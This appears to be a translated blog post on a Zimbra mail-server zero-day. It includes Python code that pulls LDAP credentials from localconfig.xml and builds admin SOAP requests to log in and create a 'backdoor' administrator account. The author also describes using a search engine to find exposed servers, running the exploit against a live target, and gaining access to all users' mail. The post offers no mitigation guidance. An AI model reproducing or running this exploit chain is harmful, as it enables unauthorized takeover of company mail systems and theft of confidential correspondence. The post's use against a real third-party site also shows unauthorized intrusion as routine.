Zimbra is a mail system deployed by many companies. It holds a large amount of internal, confidential company correspondence, so its security is extremely important.
A few days ago a 0day for it was published on exploit-db.com: <http://www.exploit-db.com/exploits/30085/>. A local file inclusion vulnerability exposes the contents of localconfig.xml, and that file contains the LDAP credentials; with those credentials the admin SOAP API under /service/admin/soap can be used to perform unauthorized operations on the mail system.
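The chain described above is a file read that becomes an administrative login. The following is an added example, not code from the original post nor from the exploit-db script, that shows the two halves the post refers to: pulling the LDAP credentials out of localconfig.xml and building the SOAP messages for /service/admin/soap (an AuthRequest with the recovered credentials, then a CreateAccountRequest that sets zimbraIsAdminAccount so the new account is an administrator). It does not perform the file-inclusion request itself, which the post does not spell out here; the localconfig.xml content and the AuthResponse are constructed samples, the key names follow Zimbra's localconfig layout, the namespace URIs and message shapes are those of Zimbra's SOAP API as I know them, and all values are assumptions.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://www.w3.org/2003/05/soap-envelope"
ZIMBRA_NS = "urn:zimbra"       # namespace of the <context> header
ADMIN_NS = "urn:zimbraAdmin"   # namespace of the admin API requests
for prefix, uri in (("soap", SOAP_NS), ("zimbra", ZIMBRA_NS), ("admin", ADMIN_NS)):
    ET.register_namespace(prefix, uri)

# Constructed stand-in for /opt/zimbra/conf/localconfig.xml: the key names
# follow Zimbra's localconfig layout, the values are invented for this example.
SAMPLE_LOCALCONFIG = """<?xml version="1.0" encoding="utf-8"?>
<localconfig>
  <key name="zimbra_server_hostname"><value>mail.example.com</value></key>
  <key name="zimbra_user"><value>zimbra</value></key>
  <key name="zimbra_ldap_userdn"><value>uid=zimbra,cn=admins,cn=zimbra</value></key>
  <key name="zimbra_ldap_password"><value>example-ldap-secret</value></key>
  <key name="ldap_root_password"><value>example-root-secret</value></key>
</localconfig>
"""

# Constructed AuthResponse of the kind the admin endpoint returns on a
# successful login; the token value is made up.
SAMPLE_AUTH_RESPONSE = """<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
  <soap:Header><context xmlns="urn:zimbra"/></soap:Header>
  <soap:Body>
    <AuthResponse xmlns="urn:zimbraAdmin">
      <authToken>0_constructed_token_value</authToken>
      <lifetime>43200000</lifetime>
    </AuthResponse>
  </soap:Body>
</soap:Envelope>
"""


def parse_localconfig(xml_text):
    """Map every <key name="..."><value>...</value></key> entry to a dict."""
    root = ET.fromstring(xml_text)
    config = {}
    for key in root.iter("key"):
        name = key.get("name")
        value = key.findtext("value")
        if name and value is not None:
            config[name] = value.strip()
    return config


def ldap_credentials(config):
    """The pair the attack needs: the zimbra account name and its LDAP password.
    Raises if either key is absent, so a partial or truncated read is noticed."""
    try:
        return config["zimbra_user"], config["zimbra_ldap_password"]
    except KeyError as missing:
        raise ValueError("localconfig.xml has no key %s" % missing)


def _envelope(auth_token=None):
    """SOAP 1.2 envelope with Zimbra's <context> header; returns (envelope, body)."""
    env = ET.Element("{%s}Envelope" % SOAP_NS)
    header = ET.SubElement(env, "{%s}Header" % SOAP_NS)
    context = ET.SubElement(header, "{%s}context" % ZIMBRA_NS)
    if auth_token:
        ET.SubElement(context, "{%s}authToken" % ZIMBRA_NS).text = auth_token
    body = ET.SubElement(env, "{%s}Body" % SOAP_NS)
    return env, body


def build_auth_request(name, password):
    """AuthRequest for /service/admin/soap: log in with the recovered credentials."""
    env, body = _envelope()
    req = ET.SubElement(body, "{%s}AuthRequest" % ADMIN_NS)
    ET.SubElement(req, "{%s}name" % ADMIN_NS).text = name
    ET.SubElement(req, "{%s}password" % ADMIN_NS).text = password
    return ET.tostring(env, encoding="unicode")


def build_create_admin_request(auth_token, account, password):
    """CreateAccountRequest carrying the auth token; zimbraIsAdminAccount=TRUE
    is what makes the new account an administrator."""
    env, body = _envelope(auth_token)
    req = ET.SubElement(body, "{%s}CreateAccountRequest" % ADMIN_NS)
    ET.SubElement(req, "{%s}name" % ADMIN_NS).text = account
    ET.SubElement(req, "{%s}password" % ADMIN_NS).text = password
    ET.SubElement(req, "{%s}a" % ADMIN_NS, n="zimbraIsAdminAccount").text = "TRUE"
    return ET.tostring(env, encoding="unicode")


def find_text(xml_text, ns, tag):
    """Text of the first <tag> in namespace ns anywhere in the document, or None."""
    node = ET.fromstring(xml_text).find(".//{%s}%s" % (ns, tag))
    return None if node is None else node.text


def parse_auth_token(response_xml):
    """authToken from an AuthResponse. A rejected login comes back as a SOAP
    Fault with no token, which is reported instead of silently returning None."""
    token = find_text(response_xml, ADMIN_NS, "authToken")
    if not token:
        raise ValueError("no authToken in response: login rejected?")
    return token.strip()


if __name__ == "__main__":
    user, secret = ldap_credentials(parse_localconfig(SAMPLE_LOCALCONFIG))
    print(build_auth_request(user, secret))
    token = parse_auth_token(SAMPLE_AUTH_RESPONSE)
    print(build_create_admin_request(token, "backdoor@example.com", "Str0ngPass!"))
```

The envelopes are built with ElementTree rather than string formatting so that a password containing `<` or `&` is escaped instead of breaking the XML. The point the example makes concrete is why a single file read is a full compromise here: the password in localconfig.xml is not just an LDAP bind secret, it is accepted by the admin SOAP endpoint as a login, and once authenticated the same endpoint can create further accounts with administrator rights.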
0x01 Vulnerability demo
Search Baidu for the string "make Zimbra Desktop offline" and you will find many systems running Zimbra:
We picked our target site and simply ran our exp against it:
It reported success, then I logged in with the new account, which also succeeded:
Note that there is an "administrator console": because this account has administrator privileges, clicking into it lets you manage all users and, of course, view everyone's mail, from the company CEO down to customer service. This is the admin home page:
0x02 How the exp works